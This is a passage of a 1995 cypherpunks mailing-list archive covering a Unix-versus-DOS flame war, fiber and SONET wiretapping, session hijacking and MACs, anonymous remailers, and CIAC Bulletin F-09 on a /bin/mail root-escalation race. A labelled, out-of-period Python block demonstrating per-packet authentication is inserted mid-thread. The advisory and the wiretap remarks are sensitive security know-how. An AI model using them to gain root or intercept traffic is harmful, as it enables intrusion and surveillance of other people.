through his computer knowledge, i.e., TRW's (credit ratings), phone service,
etc." warns the US Marshal's Service.

When contacted by Newsbytes, spokesperson Dave Fletcher at the Federal Bureau
of Investigation Press Office in Washington DC said the FBI does not hold a
warrant for Mitnick's arrest.

The fugitive warrant held by the US Marshal's Service describes Mitnick as
being a Caucasian, 5 feet 11 inches tall with a fair complexion, blue eyes,
brown hair, and wearing glasses.

(Jim Mallory/19950126/Press contact: US Marshal's Service, 202-307-9000)


-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 27 Jan 95 13:34:39 PST
To: joshua geller <joshua@alkahest.retix.com>
Subject: I Apologise for explosive vomiting.
In-Reply-To: <199501270601.WAA02306@alkahest.isas.com>
Message-ID: <Pine.3.89.9501271305.A21879-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain



Sorry:  I got flamed for laughing at Perry's rather silly statement
that unix is as easy as DOS.

They asked me to produce evidence.

Since I was working on my unix Sun Sparc Station 20 at the 
time  (with extreme reluctance), and I had just used
what unix folk humorously call their command line editor, 
so I suffered from explosive vomiting, and vomited all over 
the cypherpunks mailing list.

After the first bout of explosive vomit, I returned to work, whereupon
the unix "High Performance" file system lost one of my files,
producing the second round of explosive vomit.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 27 Jan 95 10:37:10 PST
To: weidai@eskimo.com
Subject: Re: Traffic monitoring (Was: Reordering, not Latency)
In-Reply-To: <199501270816.AA23846@mail.eskimo.com>
Message-ID: <199501271836.NAA23216@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



> How would you get access to the trunks?  Aren't they mostly optic 
> fibers now?  Also, since Internet traffic is growing at a geometric 
> rate, the probability of anyone or any organization having the 

I can't speak to the current system per se, but slowly things are
moving to SONET. A key feature of SONET is that individual channels
like DS-0 or DS-1 can be broken out without "de muxing" the
entire data stream.

Basically they have in the "system" a pointer to the memory location
of each channel and they can just pull that frame out.

This is important for a reason I have spoken here before about..

Law Enforcement loves to talk about how digital tech will make things
harder to "tap." When in fact technology like SONET will make it
easier. (today to tap into a DS-3 trunk, looking for a DS-0 channel,
you need to de-mux and pull out all the DS-1 channels, find the DS-1
that contains the DS-0 you want, and then de-mux that to get into and
Tap the DS-0.)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 27 Jan 95 13:41:29 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501271543.AA18738@snark.imsi.com>
Message-ID: <Pine.3.89.9501271325.A23224-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 1995, Perry E. Metzger wrote:
> In Unix, I can use a single command to delete an entire file tree --
> rm -r. In DOS, I have to delete each directory by hand.

Use the command deltree /y.  Or any of the cool third party
utilities, or the windows file manager which offers a true
hierarchical view unlike the hierarchical view offered by
the sun OS file manager.

> DOS doesn't even have a make utility -- perhaps you should do without
> using make ever again, as DOS is obviously superior.

I wonder how I have been compiling my files all these years.

I use make and nmake to do any non procedural task in DOS that
involves file dates and file existence, not just to compile files.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 27 Jan 95 10:50:35 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: CERT statement
In-Reply-To: <9501270006.AA17831@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950127134421.22225A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Jan 1995, Perry E. Metzger wrote:

> Kerberos per se isn't sufficient to defend against session hijacking
> attacks, you know. The situation in question is really insidious and
> requires packet-by-packet cryptographic authentication.

Do you really need to authenticate every packet?  Isn't it enough to 
authenticate the party and perform a secure key exchange, then depend on 
the encryption (+ message authentication code for block ciphers) ?

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 10:53:30 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: CERT statement
In-Reply-To: <Pine.SUN.3.91.950127134421.22225A-100000@thrash.src.umd.edu>
Message-ID: <9501271852.AA19504@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards says:
> On Thu, 26 Jan 1995, Perry E. Metzger wrote:
> 
> > Kerberos per se isn't sufficient to defend against session hijacking
> > attacks, you know. The situation in question is really insidious and
> > requires packet-by-packet cryptographic authentication.
> 
> Do you really need to authenticate every packet?  Isn't it enough to 
> authenticate the party and perform a secure key exchange, then depend on 
> the encryption (+ message authentication code for block ciphers) ?

If things are merely encrypted, an attacker can garble them without
being caught -- I can "decrypt" random numbers into other random
numbers if I want.  Think of an attacker trying to sabotage the
transfer of a binary file and you'll see why you need authentication.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Fri, 27 Jan 95 05:57:01 PST
To: cypherpunks@toad.com
Subject: re: Wei Dei: monitoring
Message-ID: <199501271356.NAA12303@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


>How would you get access to the trunks?

Not that difficult for an intelligence agency.

>Aren't they mostly optic fibers now?

Can be tapped.

>Also, since Internet traffic is growing at a geometric
>rate, the probability of anyone or any organization having the
>capacity to monitor and process ALL of Internet traffic should be
>very small and decreasing.

That's what super-computers are for (besides chaos modelling).


-rkm


---

Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 27 Jan 95 11:09:38 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: CERT statement
In-Reply-To: <9501271852.AA19504@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950127140107.22225C-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 1995, Perry E. Metzger wrote:

> If things are merely encrypted, an attacker can garble them without
> being caught -- I can "decrypt" random numbers into other random
> numbers if I want.  Think of an attacker trying to sabotage the
> transfer of a binary file and you'll see why you need authentication.

You certainly need some kind of encrypted secure checksum (MAC) to ensure 
message integrity.  I don't think you have to go through the 
entire authentication of the principal.  (Though as V. Gligor keeps 
showing, even if you have a MAC at the end of your data, there are still 
some kinds of integrity attacks which are possible if you are not careful 
about how MACs and encryption are used).

Now if you are talking about simple denial-of-service (detected tampering
or traffic flooding), that is another more difficult story. 

-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 11:32:12 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: CERT statement
In-Reply-To: <Pine.SUN.3.91.950127140107.22225C-100000@thrash.src.umd.edu>
Message-ID: <9501271931.AA19578@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards says:
> You certainly need some kind of encrypted secure checksum (MAC) to ensure 
> message integrity.  I don't think you have to go through the 
> entire authentication of the principal.

The techniques being talked about use keyed MD5, which is the equivalent.

Perry
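
Added example, not part of any message in this thread: the exchange above in runnable form, showing an encrypt-only packet garbled without detection and a per-packet MAC with a sequence number rejecting tampered, replayed and injected packets. HMAC-SHA256 stands in for the keyed MD5 Perry mentions, and the toy keystream cipher, the packet layout and all names are assumptions made for illustration.

```python
import hashlib
import hmac
import struct

TAG_LEN = 32  # HMAC-SHA256 output size in bytes


def keystream(key, seq, length):
    """Toy stream cipher (illustration only): HMAC-SHA256(key, seq || counter) blocks."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, struct.pack(">QI", seq, counter), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def crypt(enc_key, seq, data):
    """Encrypt or decrypt (same XOR operation) with no integrity protection."""
    return bytes(x ^ y for x, y in zip(data, keystream(enc_key, seq, len(data))))


def seal(enc_key, mac_key, seq, payload):
    """Packet = 8-byte sequence number || ciphertext || MAC over both."""
    header = struct.pack(">Q", seq)
    body = crypt(enc_key, seq, payload)
    tag = hmac.new(mac_key, header + body, hashlib.sha256).digest()
    return header + body + tag


class Receiver:
    """Accepts a packet only if its MAC verifies and it is the next in sequence."""

    def __init__(self, enc_key, mac_key):
        self.enc_key, self.mac_key = enc_key, mac_key
        self.next_seq = 0

    def accept(self, packet):
        """Return the plaintext, or None when the packet is rejected."""
        if len(packet) < 8 + TAG_LEN:
            return None
        header, body, tag = packet[:8], packet[8:-TAG_LEN], packet[-TAG_LEN:]
        expected = hmac.new(self.mac_key, header + body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return None  # modified in transit, or sent by someone without the key
        (seq,) = struct.unpack(">Q", header)
        if seq != self.next_seq:
            return None  # authentic but replayed or out of order
        self.next_seq += 1
        return crypt(self.enc_key, seq, body)


def demo_mac():
    # Constructed keys and data; a real session would derive keys from the key exchange.
    enc_key = hashlib.sha256(b"constructed demo key: encryption").digest()
    mac_key = hashlib.sha256(b"constructed demo key: authentication").digest()
    chunk = b"\x7fELF constructed binary chunk"

    # Encrypt-only: one byte changed on the wire still "decrypts" without any error.
    wire = bytearray(crypt(enc_key, 0, chunk))
    wire[5] ^= 0xFF
    garbled = crypt(enc_key, 0, bytes(wire))

    # Per-packet authentication: the same change, a replay and an injection all fail.
    rx = Receiver(enc_key, mac_key)
    good = seal(enc_key, mac_key, 0, chunk)
    tampered = bytearray(good)
    tampered[8 + 5] ^= 0xFF
    forged = struct.pack(">Q", 1) + b"injected data" + bytes(TAG_LEN)
    return {
        "chunk": chunk,
        "garbled": garbled,
        "tampered": rx.accept(bytes(tampered)),
        "genuine": rx.accept(good),
        "replayed": rx.accept(good),
        "injected": rx.accept(forged),
    }


if __name__ == "__main__":
    for name, value in demo_mac().items():
        print(name, value)
```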




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.sinet.org (Anonymous)
Date: Fri, 27 Jan 95 11:55:10 PST
To: cypherpunks@toad.com
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <1P8AlKJXYHxT078yn@ssnet.com>
Message-ID: <m0rXwmn-000vFYC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Again in the vein of simple to implement...you could set up several
> ghost machines that don't really exist but look as if they were
> connected to the IP machine through uucp.  I'm not really sure what
> the From: address would look like, but it should be easy to generate.
> 
> If this was workable, you could create x ghost machines and
> randomly pick a From: for each message.  True, the Inet box would
> be ID'ed, but as a transmission agent, not an originator.

Forwarded Message:


Received: by alpha.c2.org for me@alpha.c2.org
 From nobody@flame.sinet.org  Fri Jan 27 11:42:38 1995
Received: from myriad.pc.cc.cmu.edu (MYRIAD.PC.CC.CMU.EDU [128.2.93.177]) by infinity.c2.org (8.6.9/8.6.9) with SMTP id LAA24850 for <me@alpha.c2.org>; Fri, 27 Jan 1995 11:42:38 -0800
Received: from flame.sinet.org by myriad.pc.cc.cmu.edu 
                (Linux Smail3.1.28.1 #12)  
        id m0rXwcA-000vFYC; Fri, 27 Jan 95 14:45 EST
Message-Id: <m0rXwcA-000vFYC@myriad.pc.cc.cmu.edu>
Date: Fri, 27 Jan 95 14:45 EST
Subject: test
To: me@alpha.c2.org
From: nobody@flame.sinet.org (Anonymous)
Comments: This message did not originate from the above address.  It was automatically remailed by an anonymous mail service.  Please report inappropriate use to <complaints@flame.sinet.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Fri, 27 Jan 95 17:53:09 PST
To: cypherpunks@toad.com
Subject: Re:  CIAC Bulletin F-09
Message-ID: <9501272302.AA23522@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain



Sigh.  After all these years, people are still using mail systems which
run /bin/mail setuid-root instead of setgid-mail.....

Once in a while it's nice to be using System V.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Jan 95 12:18:10 PST
To: cypherpunks@toad.com
Subject: CIAC Bulletin F-09
Message-ID: <199501272017.PAA12611@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   [Note: Document reformatted for mailing by jya@pipeline.com.  
   If in doubt contact CIAC for original: 
   ciac.llnl.gov:/pub/ciac/bulletin/f-fy95/f-09.ciac.(doc).] 
 
   ________________________________________________________ 
 
                   The U.S. Department of Energy 
               Computer Incident Advisory Capability 
                   ___  __ __    _     ___ 
                  /       |     /_\   / 
                  \___  __|__  /   \  \___ 
     _________________________________________________________ 
 
                       INFORMATION BULLETIN 
 
                  Unix /bin/mail Vulnerabilities 
 
   January 27, 1995 1030 PST                     Number F-09 
   _________________________________________________________ 
 
   PROBLEM:   The Unix /bin/mail utility contains security 
              vulnerabilities. 
 
 
   PLATFORMS: DEC OSF/1 1.2, 1.3, and 2.0 
              DEC Ultrix 4.3, 4.3A, and 4.4 
              SCO Unix System V/386 Release 3.2 OS Version 
              4.2 
              SCO Open Desktop Lite Release 3.0 
              SCO Open Desktop Release 3.0 
              SCO Open Server Enterprise System Release 3.0 
              SCO Open Server Network System Release 3.0 
              Solbourne OS4.1x 
              SunOS 4.x 
 
 
   DAMAGE:    Local users may gain privileged (root) access. 
 
 
   SOLUTION:  Apply appropriate vendor patch as described 
              below. 
   _________________________________________________________ 
 
 
   VULNERABILITY 
   ASSESSMENT The vulnerabilities in the /bin/mail program 
              have been openly discussed in several Internet 
              forums, and automated scripts exploiting the 
              vulnerabilities have been widely distributed. 
              These tools have been used in many recent 
              attacks.  CIAC recommends sites install these 
              patches as soon as possible. 
   _________________________________________________________ 
 
 
   Critical Information about Unix /bin/mail Vulnerabilities 
 
 
   The /bin/mail utility on several Unix versions based on BSD 
   4.3 Unix contains a security vulnerability.  The 
   vulnerability is the result of race conditions that exist 
   during the delivery of messages to local users.  These race 
   conditions will allow intruders to create or modify files 
   on the system, resulting in privileged access to the 
   system. 
 
 
   Below is a summary of systems known to be either vulnerable 
   or not vulnerable.  If your vendor's name is not listed, 
   please contact the vendor or CIAC for more information. 
 
   Vendor or Source                   Status 
   ----------------                   ------------ 
   Apple Computer, Inc.               Not vulnerable 
   Berkeley SW Design, Inc. (BSDI)    Not vulnerable 
   Cray Research, Inc.                Not vulnerable 
   Data General Corp.                 Not vulnerable       
   Digital Equipment Corp.            Vulnerable 
   FreeBSD                            Not vulnerable 
   Harris                             Not vulnerable 
   IBM                                Not vulnerable  
   NetBSD                             Not vulnerable 
   NeXT, Inc.                         Not vulnerable  
   Pyramid                            Not vulnerable 
   The Santa Cruz Operation (SCO)     Vulnerable 
   Solbourne (Grumman)                Vulnerable 
   Sun Microsystems, Inc.             SunOS 4.x vulnerable 
                                      Solaris 2.x not         
                                      vulnerable 
 
   Patch Information 
   ----------------- 
 
   DEC        The /bin/mail patch is a part of a 
              comprehensive Security Enhanced Kit that 
              addresses other security problems as well. This 
              kit was released on May 17, 1994 and was 
              described in DEC Security Advisory #0505 and 
              CIAC Notes 94-03. 
 
 
              OSF/1 users should upgrade to a minimum of 
              version 2.0 and install Security Enhanced Kit 
              CSCPAT_4061 v1.0.  Ultrix users should upgrade 
              to at least version 4.4 and install Security 
              Enhanced Kit CSCPAT_4060 v1.0. 
 
 
              Both kits are available from your Digital 
              support channel or electronically by request 
              via DSNlink. 
 
 
   SCO        Vulnerabilities in SCO's /bin/mail utility are 
              removed by applying SCO's Support Level 
              Supplement (SLS) uod392a. It is available via 
              anonymous FTP from ftp.sco.com in the /SLS 
              directory: 
 
   Description   Filename       MD5 Checksum 
   -----------   ------------   -------------------------------- 
   Disk image    uod392a.Z      2c26669d89f61174f751774115f367a5 
 
   Cover letter  uod392a.ltr.Z  52db39424d5d23576e065af2b80aee49 
 
 
   Solbourne  Grumman System Support Corporation now performs 
              all Solbourne software and hardware support.  
              Please contact them for further information: 
 
              E-mail: support@nts.gssc.com 
              Phone:  1-800-447-2861 
              FTP:    ftp.nts.gssc.com 
 
 
   Sun        Sun has made patches available to remove 
              vulnerabilities in /bin/mail.  These patches 
              address all vulnerabilities CIAC has seen 
              exploited to date, and CIAC recommends they be 
              installed. However, the patches will be updated 
              again in the near future to remove additional 
              vulnerabilities that have recently come to 
              light.  CIAC will announce the availability of 
              the new patches when they are released. 
 
 
              The patches may be obtained from your local Sun 
              Answer Center or through anonymous FTP from 
              sunsolve1.sun.com in the /pub/patches 
              directory: 
 
   SunOS    Filename         MD5 Checksum 
   -------  ---------------  -------------------------------- 
   4.1.x    100224-13.tar.Z  90a507017a1a40c4622b3f1f00ce5d2d 
 
   4.1.3U1  101436-08.tar.Z  0e64560edc61eb4b3da81a932e8b11e1 
                  
 
   Alternative Solution 
   -------------------- 
 
   For those sites unable to obtain a vendor patch



From owner-cypherpunks  Fri Jan 27 13:19:28 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA15273; Fri, 27 Jan 95 13:19:28 PST
Received: from gateway.informix.com by toad.com id AA15259; Fri, 27 Jan 95 13:19:22 PST
Received: from informix.com (infmx.informix.com) by gateway.informix.com (4.1/SMI-4.1)
	id AA10439; Fri, 27 Jan 95 13:19:16 PST
Received: from carbon.informix.com by informix.com (4.1/SMI-4.1)
	id AA02110; Fri, 27 Jan 95 13:19:08 PST
Received: by carbon.informix.com (5.0/SMI-SVR4)
	id AA00461; Fri, 27 Jan 1995 13:19:01 +0800
Date: Fri, 27 Jan 1995 13:19:01 +0800
From: jamesd@com.informix.com
Message-Id: <9501272119.AA00461@carbon.informix.com>
Subject: Oops, Correction: one big error in "Even more unix holy war." 
Apparently-To: perry@imsi.com
Apparently-To: sdw@lig.net
Apparently-To: wmo@digibd.com
Apparently-To: cypherpunks@toad.com
Content-Length: 2646
Sender: owner-cypherpunks@toad.com
Precedence: bulk

I wrote:
> The great strength is of course symbolic debugging -- you can
> single step your compiled code, and see it displayed symbolically,
> with the symbols and statements of your source code,
> and with the contents memory displayed in terms of your
> source code variables.

On this I was of course totally wrong:

Unix has symbolic debugging equal to DOS/Windows.
I was under the false impression that it only had
C code interpretation.

This is an error -- what I said was true for C++, but 
then in Windows we too are forced to primarily use
interpretation to debug C++.   C++ symbolic debuggers
are not up to acceptable capabilities in either system.

Sorry.

But my statement concerning internationalization and
resource files was correct.

Unix has no equivalent of App Studio, etc.  I have made
a little tour of people in my company who work on both
unix and Windows.  I (fortunately) work primarily on
Windows, as you may have guessed.

The company I presently work for is making a tool they
call Window Painter.  This is in some respects similar
to App Studio.  It works with their unix database 
language.

But it is no App Studio, as the unix folk who are
working on it freely admit, those few of them that
have used App Studio.

Most of my correspondents had replies along the lines
of "Huh -- internationalization -- what source code
tools could possibly help you with internationalization."

Others listed irregular bands of random unix tools which
are essentially irrelevant to the problem of 
internationalization.

Most international unix programs have string files
that the compiled program refers to a string by a number, and
a font size by a number, and the position of the button
on screen by a number -- site customizable information,
Xdefaults, *.cfg

This is functionally equivalent to the Windows Resource
file, in that in principle one can keep translatable elements
separate from source code.  But is certainly not equivalent 
in ease of use.  One can do the job, but in essence one
does it by hand.

Resource files, and dialog box editing tools such as App Studio,
provide a clean separation between visual user interface
elements that typically require translation, and functional
code that does not.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill O'Hanlon" <wmo@digibd.com>
Date: Fri, 27 Jan 95 14:05:18 PST
To: jamesd@com.informix.com
Subject: Re: Oops, Correction: one big error in "Even more unix holy war."
In-Reply-To: <9501272119.AA00461@carbon.informix.com>
Message-ID: <9501272204.AA27636@poe.digibd.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 1995 13:19:01 +0800  jamesd@com.informix.com wrote:
--------
> > source code variables.
> 
> On this I was of course totally wrong:
> 
> Unix has symbolic debugging equal to DOS/Windows.
> I was under the false impression that it only had
> C code interpretation.
> 
> This is an error -- what I said was true for C++, but 
> then in Windows we too are forced to primarily use
> interpretation to debug C++.   C++ symbolic debuggers
> are not up to acceptable capabilities in either system.
> 
> Sorry.

It just gets worse and worse.

James, the debugging environment I've been referring to, and the product
I've been debugging is written in C++.  Let me be perfectly clear, here:

The product is an embedded processor.
I'm running a development environment on a Sun workstation.
The code running on the processor is written in C++.
The debugger is a symbolic debugger, and it can do breakpoints on lines of
code, displays of expressions involving symbolic names, and all of the other
points about debuggers that I recall you making.
The code uses all C++ features quite heavily.
There is no C or C++ interpretation involved.
The environment is freely available.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Acklin <hroller@metronet.com>
Date: Fri, 27 Jan 95 14:09:24 PST
To: cypherpunks@toad.com
Subject: CIAC Bulletin F-09: Unix /bin/mail Vulnerability (fwd)
Message-ID: <Pine.HPP.3.90.950127160855.15913A-100000@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Just got this in the mail and thought I would share it with all of you...

---------- Forwarded message ----------
Date: Fri, 27 Jan 1995 11:16:55 -0800
From: Steve Weeber <weeber@eek.llnl.gov>
To: hroller@metronet.com
Subject: CIAC Bulletin F-09: Unix /bin/mail Vulnerability

            _____________________________________________________
                       The U.S. Department of Energy
                    Computer Incident Advisory Capability
                           ___  __ __    _     ___
                          /       |     /_\   /
                          \___  __|__  /   \  \___
            _____________________________________________________

                            INFORMATION BULLETIN

                       Unix /bin/mail Vulnerabilities

January 27, 1995 1030 PST                                        Number F-09
_____________________________________________________________________________

PROBLEM:       The Unix /bin/mail utility contains security vulnerabilities.
PLATFORMS:     DEC OSF/1 1.2, 1.3, and 2.0
               DEC Ultrix 4.3, 4.3A, and 4.4
               SCO Unix System V/386 Release 3.2 OS Version 4.2
               SCO Open Desktop Lite Release 3.0
               SCO Open Desktop Release 3.0
               SCO Open Server Enterprise System Release 3.0
               SCO Open Server Network System Release 3.0
               Solbourne OS4.1x
               SunOS 4.x
DAMAGE:        Local users may gain privileged (root) access.
SOLUTION:      Apply appropriate vendor patch as described below.
_____________________________________________________________________________

VULNERABILITY  The vulnerabilities in the /bin/mail program have been openly
ASSESSMENT:    discussed in several Internet forums, and automated scripts
               exploiting the vulnerabilities have been widely distributed.
               These tools have been used in many recent attacks.  CIAC
               recommends sites install these patches as soon as possible.
_____________________________________________________________________________

          Critical Information about Unix /bin/mail Vulnerabilities

The /bin/mail utility on several Unix versions based on BSD 4.3 Unix contains
a security vulnerability.  The vulnerability is the result of race conditions
that exist during the delivery of messages to local users.  These race
conditions will allow intruders to create or modify files on the system,
resulting in privileged access to the system.

Below is a summary of systems known to be either vulnerable or not
vulnerable.  If your vendor's name is not listed, please contact the vendor
or CIAC for more information.

   Vendor or Source                   Status
   ----------------                   ------------
   Apple Computer, Inc.               Not vulnerable
   Berkeley SW Design, Inc. (BSDI)    Not vulnerable
   Cray Research, Inc.                Not vulnerable
   Data General Corp.                 Not vulnerable      
   Digital Equipment Corp.            Vulnerable
   FreeBSD                            Not vulnerable
   Harris                             Not vulnerable
   IBM                                Not vulnerable 
   NetBSD                             Not vulnerable
   NeXT, Inc.                         Not vulnerable 
   Pyramid                            Not vulnerable
   The Santa Cruz Operation (SCO)     Vulnerable
   Solbourne (Grumman)                Vulnerable
   Sun Microsystems, Inc.             SunOS 4.x vulnerable
                                      Solaris 2.x not vulnerable

Patch Information
-----------------

DEC          The /bin/mail patch is a part of a comprehensive Security
             Enhanced Kit that addresses other security problems as well.
             This kit was released on May 17, 1994 and was described in
             DEC Security Advisory #0505 and CIAC Notes 94-03.

             OSF/1 users should upgrade to a minimum of version 2.0 and
             install Security Enhanced Kit CSCPAT_4061 v1.0.  Ultrix users
             should upgrade to at least version 4.4 and install Security
             Enhanced Kit CSCPAT_4060 v1.0.

             Both kits are available from your Digital support channel or
             electronically by request via DSNlink.


SCO          Vulnerabilities in SCO's /bin/mail utility are removed by
             applying SCO's Support Level Supplement (SLS) uod392a. It is
             available via anonymous FTP from ftp.sco.com in the /SLS
             directory:

             Description   Filename       MD5 Checksum
             ------------  -------------  --------------------------------
             Disk image    uod392a.Z      2c26669d89f61174f751774115f367a5
             Cover letter  uod392a.ltr.Z  52db39424d5d23576e065af2b80aee49


Solbourne    Grumman System Support Corporation now performs all Solbourne
             software and hardware support.  Please contact them for
             further information:

                E-mail: support@nts.gssc.com
                Phone:  1-800-447-2861
                FTP:    ftp.nts.gssc.com


Sun          Sun has made patches available to remove vulnerabilities in
             /bin/mail.  These patches address all vulnerabilities CIAC has
             seen exploited to date, and CIAC recommends they be installed.
             However, the patches will be updated again in the near future
             to remove additional vulnerabilities that have recently come
             to light.  CIAC will announce the availability of the new
             patches when they are released.

             The patches may be obtained from your local Sun Answer Center
             or through anonymous FTP from sunsolve1.sun.com in the
             /pub/patches directory:

             SunOS    Filename         MD5 Checksum
             -------  ---------------  --------------------------------
             4.1.x    100224-13.tar.Z  90a507017a1a40c4622b3f1f00ce5d2d
             4.1.3U1  101436-08.tar.Z  0e64560edc61eb4b3da81a932e8b11e1
                 

Alternative Solution
--------------------

For those sites unable to obtain a vendor patch for a vulnerable version of
/bin/mail, a replacement package called mail.local has been developed and
made freely available on the Internet.  The /bin/mail program is relatively
complex software, serving both as a mail delivery agent and a user interface,
allowing users to send and read E-mail messages.  Complex system software,
like /bin/mail, is more likely to exhibit security vulnerabilities.

The mail.local package was written to perform only one task: the delivery
of mail to local users.  It is comparatively small, and the code has been
examined carefully by experts in the security community.  While it has not
been formally evaluated, it is probable that mail.local addresses all
vulnerabilities currently being exploited in /bin/mail.

For more information, see the file README in the directory
ftp://coast.cs.purdue.edu/pub/tools/unix/mail.local/.

_____________________________________________________________________________

CIAC wishes to acknowledge the contributions of the CERT Coordination
Center in the construction of this bulletin.
_____________________________________________________________________________

For emergencies and off-hour assistance, DOE and DOE contractor sites can
contact CIAC 24-hours a day via an integrated voicemail and SKYPAGE number.
To use this service, dial 1-510-422-8193 or 1-800-759-7243 (SKYPAGE). The
primary SKYPAGE PIN number, 8550070 is for the CIAC duty person. A second
PIN, 8550074 is for the CIAC Project Leader.  CIAC's FAX number is
510-423-8002, and the STU-III number is 510-423-2604.  Send E-mail to
ciac@llnl.gov.

Previous CIAC notices, anti-virus software, and other information are
available on the Internet via anonymous FTP from ciac.llnl.gov (IP address
128.115.19.53).

CIAC has several self-subscribing mailing lists for electronic publications:
1.  CIAC-BULLETIN for Advisories, highest priority - time critical
    information, and Bulletins, important computer security information;
2.  CIAC-NOTES for Notes, a collection of computer security articles;
3.  SPI-ANNOUNCE for official news about Security Profile Inspector (SPI)
    software updates, new features, distribution and availability;
4.  SPI-NOTES, for discussion of problems and solutions regarding the use of
    SPI products.

Our mailing lists are managed by a public domain software package called
ListProcessor, which ignores E-mail header subject lines. To subscribe (add
yourself) to one of our mailing lists, send requests of the following form:

subscribe list-name LastName, FirstName PhoneNumber

as the E-mail message body, substituting CIAC-BULLETIN, CIAC-NOTES,
SPI-ANNOUNCE or SPI-NOTES for "list-name" and valid information for
"LastName" "FirstName" and "PhoneNumber."  Send to: ciac-listproc@llnl.gov
not to: ciac@llnl.gov

e.g.,
subscribe ciac-notes O'Hara, Scarlett 404-555-1212 x36
subscribe ciac-bulletin O'Hara, Scarlett 404-555-1212 x36

You will receive an acknowledgment containing address and initial PIN, and
information on how to change either of them, cancel your subscription, or get
help.
_____________________________________________________________________________

PLEASE NOTE: Many users outside of the DOE and ESnet computing communities
receive CIAC bulletins. If you are not part of these communities, please
contact your agency's response team to report incidents. Your agency's team
will coordinate with CIAC. The Forum of Incident Response and Security Teams
(FIRST) is a world-wide organization. A list of FIRST member organizations
and their constituencies can be obtained by sending E-mail to
first-request@first.org with an empty subject line and a message body
containing the line: send first-contacts.

This document was prepared as an account of work sponsored by an agency of
the United States Government. Neither the United States Government nor the
University of California nor any of their employees, makes any warranty,
expressed or implied, or assumes any legal liability or responsibility for
the accuracy, completeness, or usefulness of any information, product, or
process disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products, process,
or service by trade name, trademark, manufacturer, or otherwise, does not
necessarily constitute or imply its endorsement, recommendation, or favoring
by the United States Government or the University of California. The views
and opinions of authors expressed herein do not necessarily state or reflect
those of the United States Government nor the University of California, and
shall not be used for advertising or product endorsement purposes.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@vail.tivoli.com (Mike McNally)
Date: Fri, 27 Jan 95 14:35:59 PST
To: cypherpunks@toad.com
Subject: Oops, Correction: one big error in "Even more unix holy war."
